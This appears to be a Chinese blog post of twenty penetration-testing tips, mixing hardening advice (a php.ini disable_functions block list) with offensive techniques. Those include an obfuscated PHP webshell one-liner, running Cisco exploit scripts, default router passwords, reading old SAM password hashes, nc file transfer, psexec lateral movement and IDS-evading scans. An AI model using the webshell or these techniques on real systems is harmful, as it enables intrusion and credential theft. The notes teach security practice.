滲透測試筆記五
滲透測試筆記主要為一些短小但又精華的滲透小技巧,旨在與小伙伴們分享學(xué)習(xí)心得。為保證質(zhì)量,每一篇為20條左右的滲透小記。
1、小小一招,讓你的電腦安全起來:在“運行”對話框中輸入“gpedit.msc”打開“本地組策略編輯器”窗口,展開“用戶配置/管理模板/系統(tǒng)”目錄,可雙擊配置禁止運行指定程序、禁止訪問注冊表、禁止訪問命令提示符、禁止訪問控制面板等策略。
2、在注冊表編輯器中,依次打開HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug分支,雙擊“Auto”鍵值項,可以防止系統(tǒng)隱私信息被泄露。(應(yīng)該是禁止生成dmp文件。)
3、HTTP協(xié)議代理服務(wù)器常用端口號:
80(Apache服務(wù)器默認(rèn)、Nginx服務(wù)器默認(rèn)、lighttpd服務(wù)器默認(rèn)) 8080(tomcat服務(wù)器默認(rèn)、kangle服務(wù)器默認(rèn)) 3128(Squid服務(wù)器默認(rèn)) 8081(用戶習(xí)慣) 9080(WebSpher服務(wù)器默認(rèn)) 7001(weblogic的默認(rèn)端口)
4、在php.ini禁止一些危險函數(shù)的執(zhí)行:
如果不希望執(zhí)行包括system()等在那的能夠執(zhí)行命令的php函數(shù),或者能夠查看php信息的phpinfo()等函數(shù),那么我們就可以禁止它們:
disable_functions = system,passthru,exec,shell_exec,popen,phpinfo
如果你要禁止任何文件和目錄的操作,那么可以關(guān)閉很多文件操作:
disable_functions = chdir,chroot,dir,getcwd,opendir,readdir,scandir,fopen,unlink,delete,copy,mkdir, rmdir,rename,file,file_get_contents,fputs,fwrite,chgrp,chmod,chown
此時就能夠抵制大部分的phpshell了。
5、一個非常聰(淫)明(蕩)的隱藏一句話方法:
$asse=$asse{0}.$asse{1}.$asse{1}.$asse{2}.$asse{3}.$asse{4}; @$asse($_POST[$_GET['s']]);
6、默認(rèn)情況下,Linux系統(tǒng)的TTL值為64或255,Windows NT/2000/XP系統(tǒng)的默認(rèn)TTL值為128,Win7系統(tǒng)的TTL值是64,Windows 98系統(tǒng)的TTL值為32,UNIX主機(jī)的TTL值為255。(但這是可以修改的)
7、在使用Nmap掃描端口的時候,端口狀態(tài)可能會出現(xiàn)filtered / unfiltered.filtered是指有防火墻或是其他過濾裝置在對這個端口進(jìn)行過濾,所以Nmap需要進(jìn)一步查明端口是否開放;unfiltered狀態(tài)只有在大多數(shù)的掃描端口都處在filter狀態(tài)下才出現(xiàn),說明Nmap能夠訪問這個端口,但是不清楚這個端口打開的狀態(tài)。
8、安全漏洞生命周期(圖片摘自諸葛建偉《Matesploit滲透測試魔鬼訓(xùn)練營》)

9、msfpayload、msfencode和msfvenom可以將攻擊載荷封裝為可執(zhí)行文件、C語言、JavaScript語言等多種形式,并可以進(jìn)行各種類型的編碼。
10、Metasploit攻擊載荷模塊分為獨立(Singles)、傳輸器(Stager)、傳輸體(Stage)三種類型。
例如:“windows/shell_bind_tcp”是一個獨立攻擊載荷。“windows/shell/bind_tcp”是一個由傳輸器載荷(bind_tcp)和一個傳輸體載荷(shell)所組成,其功能相當(dāng)于“windows/shell_bind_tcp”。
11、Metasploit在自動為payload選擇編碼器進(jìn)行編碼時,可能找不到合適的編碼器。因為這個編碼器既能夠?qū)⒕幋a后的payload大小控制在一定范圍內(nèi),又要完全避免出現(xiàn)“壞字符”。這種情況下就會出現(xiàn)“No encoder encoded the buffer succcessfully”報錯。
12、BackTrack5 升級Metasploit至Git更新的方法 (無法使用msfupdate解決方法):
(1)用vim修改文件:
/opt/metasploit/ruby/lib/ruby/1.9.1/i686-linux/rbconfig.rb changed the line => CONFIG["LIBRUBYARG_STATIC"] = "-Wl,-R -Wl,$(libdir) -L$(libdir) -l$(RUBY_SO_NAME)-static" by => CONFIG["LIBRUBYARG_STATIC"] = "-Wl,-R -Wl,$(libdir) -L$(libdir) "(其實就是去掉-l$(RUBY_SO_NAME)-static)
(2)切換至
/opt/metasploit/msf3
然后運行
/opt/metasploit/ruby/bin/bundle install
(3)
msfupdate
(小編親測不行,是由于我以前對MSF的改動較多嗎?各位騷年還是換Kali吧!不過如果不是特別專業(yè)的滲透測試人員,沒必要總是保持最新狀態(tài),不必在乎這些細(xì)節(jié) :))
13、利用BT5檢查cisco路由器是否出現(xiàn)漏洞
定位到以下目錄:
/pentest/cisco/cisco-global-exploiter
運行名為cge.pl的Perl文件,這個文件沒有任何選項。根據(jù)運行的版本的不同,屏幕上最多會出現(xiàn)14個不同的選項,每個選項都會引用一個試圖利用不同漏洞的腳本。這能夠幫助企業(yè)更有效地測試路由器面向外部的接口,企業(yè)應(yīng)該經(jīng)常進(jìn)行測試。91ri.org注:這個是在backtrack下的 其他滲透系統(tǒng)自行find
假設(shè)測試的路由器有一個外部IP地址200.1.1.1,輸入以下命令:
./cge.pl 200.1.1.1 2
14、大家都知道思科的默認(rèn)用戶名和默認(rèn)密碼都是cisco,很多管理員喜歡把enable口令改成class。
15、安全帳戶管理器多年來一直是微軟操作系統(tǒng)的核心部分,現(xiàn)在也是Windows 8.1的一部分。SAM的功能固定于lsass.exe中。lsass.exe是一個位于c:\Windows\system32的Windows服務(wù)。
16、SAM的備份文件位于c:\windows\system32\repair\。如果密碼被定期更改,過期密碼會包含在這個文件中,但登錄到計算機(jī)的任何賬戶都可以訪問到這個文件。只需要在機(jī)器上創(chuàng)建一個普通帳戶,就可以查看了。
17、ssh反彈內(nèi)網(wǎng)端口幾個比較重要的參數(shù):
1-f: 連接成功后切換到后臺,不會占用當(dāng)前的shell,shell斷了也會繼續(xù)執(zhí)行,相當(dāng)于 nohup和&。
2-N: 連接后不調(diào)用shell
3-R:把本地網(wǎng)絡(luò)(可以是本機(jī)或者任何內(nèi)網(wǎng)甚至外網(wǎng)端口)端口反彈到ssh服務(wù)器
18、用nc方法往linux系統(tǒng)傳文件:
先在服務(wù)端監(jiān)聽:
nc -l port > 文件名
然后到要發(fā)送文件的服務(wù)器:
nc 服務(wù)端ip 端口 < 文件名
(注:發(fā)送小文件還行,大文件有時候會斷。)
19、有些時候你拿了linux服務(wù)器的shell,想跨到windows的機(jī)器上,基本就是通過兩個手段,一個是針對windows的服務(wù)進(jìn)行exploit溢出,還有就是利用在linux上搜集的用戶名和密碼然后通過psexec放shell。
20、想要確定是不是windows主機(jī),在內(nèi)網(wǎng)掃開445和3389的機(jī)器,基本是windows了。掃的時候要注意,不管用什么工具,盡量用socket connect的方式掃。像SYN 方式掃描如果內(nèi)網(wǎng)有ids之類肯定會被發(fā)現(xiàn),connect方式掃描相對來說和正常連接差不多。